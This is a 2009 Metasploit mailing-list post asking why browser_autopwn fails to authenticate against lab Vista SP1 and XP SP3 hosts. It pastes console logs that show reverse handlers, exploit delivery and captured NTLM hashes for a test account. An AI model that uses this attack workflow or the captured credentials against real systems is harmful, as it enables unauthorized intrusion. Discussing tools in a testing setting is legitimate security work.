Metasploit mailing list archives
MetaSploit Failing to authenticate Vista SP1 and XP3 with Hash
From: devgreendev at gmail.com (Developer Developer)
Date: Tue, 24 Mar 2009 20:09:48 -0400
I am using MSF 3.3 Beta as a part of BackTrack release on Ubuntu. When I use browser_autopwn against Vista SP1 or XP SP3, the exploit always fail to Authenticate. As a results I never get a single session. Here is the extracts from the exploits. Any idea how can I make the exploit successfully use NTLM hashes and establish a session? My passowrds are less than 5 characters in both machines: Vista SP1 Request '/mysite' from 192.168.7.102:2207 19:58:02 [*] Recording detection from User-Agent 19:58:02 [*] Browser claims to be MSIE 7.0, running on Windows Vista 19:58:02 [*] Responding with exploits 19:58:03 [*] Received 192.168.7.102:2208 Vista32WRG\JohnTest LMHASH:153e5d7f5b312ee9aa8049032039db0c11119e30ca92c54f NTHASH:9e615fc8ac099cd7be86d72f3dfa1683010100000000000019c2e44bdbacc90111119e30ca92c54f00000000020000000000000000000000 OS: LM: 19:58:03 [*] Authenticating to 192.168.7.102 as Vista32WRG\JohnTest... 19:58:03 [*] Failed to authenticate as Vista32WRG\JohnTest... 19:58:03 [*] Sending Access Denied to 192.168.7.102:2208 Vista32WRG\JohnTest 19:58:03 [*] Received 192.168.7.102:2208 Vista32WRG\JohnTest LMHASH:2dc7feda29e091364c4ed7d828d3963970d41418fa35c8d1 NTHASH:8a4882f8c765a5e808930dd1372d15840101000000000000b9b9e84bdbacc90170d41418fa35c8d100000000020000000000000000000000 OS: LM: 19:58:03 [*] Authenticating to 192.168.7.102 as Vista32WRG\JohnTest... XP SP3 19:12:39 [*] Using URL: http://0.0.0.0:80/eHRQvzSu9X<http://0.0.0.0/eHRQvzSu9X> 19:12:39 [*] Local IP: http://192.168.7.124:80/eHRQvzSu9X<http://192.168.7.124/eHRQvzSu9X> 19:12:39 [*] Server started. 19:12:39 [*] Handler binding to LHOST 0.0.0.0 19:12:39 [*] Started reverse handler 19:12:39 [*] Server started. 19:12:39 [*] Handler binding to LHOST 0.0.0.0 19:12:39 [*] Started reverse handler 19:12:39 [*] Server started. 19:12:42 [*] Request '/mysite' from 192.168.7.121:1156 19:12:42 [*] Recording detection from User-Agent 19:12:42 [*] Browser claims to be MSIE 7.0, running on Windows XP 19:12:42 [*] Responding with exploits 19:12:43 [*] Received 192.168.7.121:1157 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1 19:12:43 [*] Sending Access Denied to 192.168.7.121:1157 \ 19:12:43 [*] Received 192.168.7.121:1157 MTST1\JohnTest LMHASH:6c00dac9ca9d91a15da2717f1088277fd89b654a7f441533 NTHASH:8d32888414d979965132b107b55207212f866aa0a8dd3520 OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1 19:12:43 [*] Authenticating to 192.168.7.121 as MTST1\JohnTest... 19:12:43 [*] Failed to authenticate as MTST1\JohnTest... 19:12:43 [*] Sending Access Denied to 192.168.7.121:1157 MTST1\JohnTest 19:12:43 [*] Received 192.168.7.121:1159 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1 19:12:43 [*] Sending Access Denied to 192.168.7.121:1159 \ -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090324/a4890ac9/attachment.htm>
Current thread:
- MetaSploit Failing to authenticate Vista SP1 and XP3 with Hash Developer Developer (Mar 24)
- MetaSploit Failing to authenticate Vista SP1 and XP3 with Hash H D Moore (Mar 24)
- ms09_002 and IE8 Aczire (Mar 26)
- ms09_002 and IE8 Trancer (Mar 26)
- MetaSploit Failing to authenticate Vista SP1 and XP3 with Hash Ron (Mar 26)
- ms09_002 and IE8 Aczire (Mar 26)
- MetaSploit Failing to authenticate Vista SP1 and XP3 with Hash H D Moore (Mar 24)